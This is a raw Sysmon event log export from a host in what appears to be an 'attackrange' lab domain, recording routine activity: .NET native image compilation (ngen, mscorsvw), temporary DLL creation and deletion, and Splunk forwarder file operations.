23542300x800000000000000018769Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:07.349{4DB9351A-A113-60D3-6602-00000000CF01}5480NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\IZQO2GMGH6\System.Drawing.Design.ni.dll.auxMD5=B19345322480F2E2BC4B763604F979F8,SHA256=6E607CA83CF2BDC4EB083F3BBE7C01821B0F87EE4619AEB6A433B2F854BB0EEA,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000018768Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:07.349{4DB9351A-A113-60D3-6602-00000000CF01}5480NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\IZQO2GMGH6\System.Drawing.Design.ni.dllMD5=170CEFCBC68C8C437037E15CC4F6A3B6,SHA256=6BCC8F8B2A7C9D4CB3F9AB6039AF749F103B72B2F489A1DFAADC2B17CC4F6AB0,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000018767Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:01:07.318{4DB9351A-A113-60D3-6602-00000000CF01}5480C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1568-0\System.Drawing.Design.dll2021-06-23 21:01:07.318 23542300x800000000000000018766Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:07.287{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=678BDF99AA8D0216EC8090758F3B39D4,SHA256=0847FAD8B0FDBF6862077AA3B5CA3690251B5532BD080A1F4A6AEEC7E0777A89,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000018765Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:01:07.021{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A113-60D3-6602-00000000CF01}5480C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018764Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:07.005{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A113-60D3-6602-00000000CF01}5480C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018763Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:01:07.005{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A113-60D3-6602-00000000CF01}5480C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018796Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:08.880{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A114-60D3-6B02-00000000CF01}7148C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000018795Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:08.849{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A114-60D3-6B02-00000000CF01}7148C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018794Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:08.849{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A114-60D3-6B02-00000000CF01}7148C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL
+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000018793Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:08.755{4DB9351A-A113-60D3-6A02-00000000CF01}2796NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\NEWXW0B0CP\System.EnterpriseServices.Wrapper.dllMD5=A08AC30FD2DA1C8BE3C3C7BE75FDFD2B,SHA256=B237D98A0720E6FB5071AB148FA81D23A66973B402EF83E32DF6EF8435E4934C,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000018792Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:08.740{4DB9351A-A113-60D3-6A02-00000000CF01}2796NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\NEWXW0B0CP\System.EnterpriseServices.ni.dll.auxMD5=03159FDC9862F6EB36FF8B4040583B3E,SHA256=69B0577DCFCFD3B2FE87531F5A6B36A19CFD883AD7AF1CF98ED84B27DDA87086,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018791Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:08.740{4DB9351A-A113-60D3-6A02-00000000CF01}2796NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\NEWXW0B0CP\System.EnterpriseServices.ni.dllMD5=0F00677E276218902156F50628C49B68,SHA256=1773C9D95983AD253B4BE80D98218CBA784B945690BC5379CBF5C882A1E2E55E,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000018790Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:01:08.724{4DB9351A-A113-60D3-6A02-00000000CF01}2796C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\aec-0\System.EnterpriseServices.dll2021-06-23 21:01:08.724 11241100x800000000000000018789Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 
21:01:08.693{4DB9351A-A113-60D3-6A02-00000000CF01}2796C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\aec-0\System.EnterpriseServices.Wrapper.dll2021-06-23 21:01:08.693 23542300x800000000000000018788Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:08.568{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5430EAB9002892D66C93F23E9FC9EC24,SHA256=E7E348B921D2545DDCBEE777A8DA9F6B0C7BB6C55B0CDACF79FD18CF9AFCA486,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018787Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:08.318{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A22FFAB9F05CCB5B5A0D1965A89C1CD9,SHA256=FE820BBFF00CB6DAE3DD5833A4B0BA4D6EED5A3925DE903F3F957A291358BB10,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000018786Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:01:08.005{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A113-60D3-6A02-00000000CF01}2796C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018785Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:07.990{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A113-60D3-6A02-00000000CF01}2796C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018784Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:01:07.990{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A113-60D3-6A02-00000000CF01}2796C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000018801Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:09.849{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C31B43822F8CC6329A01760371CB7902,SHA256=7FCCA36761F2D8F6C648617AF9004845DF02F955CEDE10178A43D1E36B29E244,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018800Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:09.333{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8FC0E0C56E8AC2F914852241DB8C7B4E,SHA256=A42A77F65533611B85123BE100F5158AC24355E7CA2CE1D868EB972A0B6B79A9,IMPHASH=00000000000000000000000000000000falsetrue 
10341000x800000000000000018799Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:09.021{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A115-60D3-6C02-00000000CF01}3332C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018798Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:09.021{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A115-60D3-6C02-00000000CF01}3332C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018797Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:01:09.021{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A115-60D3-6C02-00000000CF01}3332C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000018802Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:10.451{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=52A80D7DCF5F498B9F9FAD4395D612FA,SHA256=BC5347BBD1F1E7ED1F8C8EA362447998BCD9D6DFD2F1FAA4EFB5B3414E77E9E3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000018816Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:01:11.764{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A117-60D3-6F02-00000000CF01}6768C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018815Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:11.748{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A117-60D3-6F02-00000000CF01}6768C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018814Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:01:11.748{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A117-60D3-6F02-00000000CF01}6768C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000018813Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:11.685{4DB9351A-A117-60D3-6E02-00000000CF01}6528NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\ZO7T9PAIOP\System.IdentityModel.Selectors.ni.dll.auxMD5=680522C65915FDF66DB847EF6302A49D,SHA256=CEBE8F735B000BA8FB3C3BB0504CDF928926EB2215144F1B20AD4734073F2E17,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000018812Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:11.685{4DB9351A-A117-60D3-6E02-00000000CF01}6528NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\ZO7T9PAIOP\System.IdentityModel.Selectors.ni.dllMD5=7EACED69AC81CB1F4E3FA510A32FA803,SHA256=0C4E0B80295320F20F278D3DC28C4BE907390706EA77F47C06B1B8473B84911D,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000018811Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:01:11.670{4DB9351A-A117-60D3-6E02-00000000CF01}6528C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1980-0\System.IdentityModel.Selectors.dll2021-06-23 21:01:11.670 10341000x800000000000000018810Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:11.514{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A117-60D3-6E02-00000000CF01}6528C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018809Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:01:14.685{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A11A-60D3-7A02-00000000CF01}2236C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018869Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:14.685{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A11A-60D3-7A02-00000000CF01}2236C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018868Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
